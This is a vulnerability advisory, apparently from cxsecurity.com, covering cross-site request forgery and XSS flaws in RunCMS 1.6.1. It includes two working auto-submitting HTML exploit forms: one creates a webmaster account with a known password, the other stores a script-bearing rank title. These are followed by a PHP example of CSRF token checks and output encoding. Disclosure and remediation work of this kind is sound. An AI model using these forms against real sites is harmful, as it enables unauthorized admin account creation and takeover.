RunCMS 1.6.1 Multiple XSS and XSRF Vulnerabilities
2009.09.15
Credit: nbbn
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2008-7221 | CVE-2008-7222
CWE: CWE-352, CWE-79
###### RunCMS 1.6.1 Multiple XSS and XSRF Vulnerabilities by NBBN ######

[b]1) Create Webmaster (admin) XSRF Vulnerability[/b]

<html><head></head>
<!-- the form below is named "r", so the auto-submit targets document.r -->
<body onLoad="javascript:document.r.submit()">
<form action="http://localhost/xampp/runcms/modules/system/admin.php" method="post" enctype="multipart/form-data" name="r">
<input type="hidden" name="uname" value="Attacker">
<input type="hidden" name="name" value="Attacker">
<input type="hidden" name="email" value="attack (at) attack (dot) com [email concealed]">
<input type="hidden" name="url" value="">
<input type="hidden" name="user_avatar" value="blank.gif">
<input type="hidden" name="theme" value="helloween">
<input type="hidden" name="timezone_offset" value="0">
<input type="hidden" name="language" value="deutsch">
<input type="hidden" name="user_icq" value="">
<input type="hidden" name="user_aim" value="">
<input type="hidden" name="user_msnm" value="">
<input type="hidden" name="user_from" value="">
<input type="hidden" name="user_occ" value="">
<input type="hidden" name="user_intrest" value="">
<input type="hidden" name="user_birth%5b2%5D" value="">
<input type="hidden" name="user_birth%5B1%5D" value="">
<input type="hidden" name="user_birth%5BO%5D" value="">
<input type="hidden" name="user_sig" value="">
<input type="hidden" name="umode" value="flat">
<input type="hidden" name="uorder" value="1">
<input type="hidden" name="bio" value="">
<!-- rank 7 is the webmaster (admin) rank; no anti-CSRF token is required by admin.php -->
<input type="hidden" name="rank" value="7">
<input type="hidden" name="pass" value="Password">
<input type="hidden" name="pass2" value="Password">
<input type="hidden" name="fct" value="users">
<input type="hidden" name="op" value="addUser">
<input type="hidden" name="submit" value="%DCbernehmen">
</form>
</body>
</html>

With the same XSRF weakness an attacker can also update the profile of any user, e.g. change their password.

[b]2) Cross-Site Scripting (an attacker can only attack an admin)[/b]

<html><head></head>
<body onLoad="javascript:document.r.submit()">
<form action="http://localhost/xampp/runcms/modules/system/admin.php" method="post" enctype="multipart/form-data" name="r">
<!-- rank_title is stored and later rendered without encoding, so the tag executes in the admin's browser -->
<input type="text" class="text" name="rank_title" size="30" maxlength="50" value="<marquee>Cross-Site Scritping :-("/>
<input type="hidden" name="fct" value="userrank">
<input type="hidden" name="op" value="RankForumAdd">
</form>
</body>
</html>
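As an added defensive example, not RunCMS's own code, this is how the two admin.php operations named above (addUser and RankForumAdd) could be protected: a per-session anti-CSRF token that a cross-site form cannot supply, and output encoding for rank_title so a stored <marquee> payload renders as text. The function names and the session layout are assumptions; it needs PHP 7 or later for random_bytes().

```php
<?php
// Added example (not RunCMS code): CSRF token check plus output encoding
// for an admin form. Assumes a logged-in admin session; names are hypothetical.

function csrf_token(): string {
    // One unpredictable token per session, issued on first use.
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrf_check(array $post): bool {
    // A forged cross-site POST cannot read the victim's session token,
    // so it fails here; hash_equals avoids a timing side channel.
    return isset($post['csrf_token'], $_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], (string) $post['csrf_token']);
}

function render_rank_title(string $title): string {
    // Stored XSS fix: encode on output so "<marquee>..." is shown literally.
    return htmlspecialchars($title, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

session_start();

// State-changing operations (addUser, RankForumAdd, ...) only run after
// the token check; a request without a valid token is rejected outright.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && !csrf_check($_POST)) {
    http_response_code(403);
    exit('Invalid or missing CSRF token');
}
// ... existing $_POST['op'] dispatch continues here ...
?>
<!-- The legitimate form carries the token; the stored title is encoded on output. -->
<form action="admin.php" method="post">
  <input type="hidden" name="csrf_token" value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES) ?>">
  <input type="text" name="rank_title" maxlength="50"
         value="<?= render_rank_title($_POST['rank_title'] ?? '') ?>">
  <input type="hidden" name="fct" value="userrank">
  <input type="hidden" name="op" value="RankForumAdd">
  <button type="submit">Save</button>
</form>
```

The same check must cover the profile-update path, since the advisory notes that XSRF there lets an attacker change any user's password.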
References:
http://xforce.iss.net/xforce/xfdb/40630
http://www.securityfocus.com/bid/27852
http://www.securityfocus.com/archive/1/archive/1/488287/100/200/threaded
Copyright 2024, cxsecurity.com